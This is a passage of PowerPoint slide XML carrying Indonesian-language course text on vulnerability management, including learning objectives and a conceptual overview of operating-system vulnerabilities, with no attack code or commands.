              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>versi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>usang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setelah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memvalidasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengklasifikasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memprioritaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teridentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>remediasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>faktor-faktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemudahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengeksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pentingnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berisiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Siklus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penilaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peningkatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkelanjutan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempertahankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Tujuan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pembelajaran</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelajaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal-hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menjelaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pentingnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menjelaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Merangkum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menjelaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</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173</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="379508221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Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memainkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sentral</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>muncul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelemahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>desain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesalahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kodenya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengaturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> default yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengeksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengganggu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencuri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kekhawatiran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tambahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>muncul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
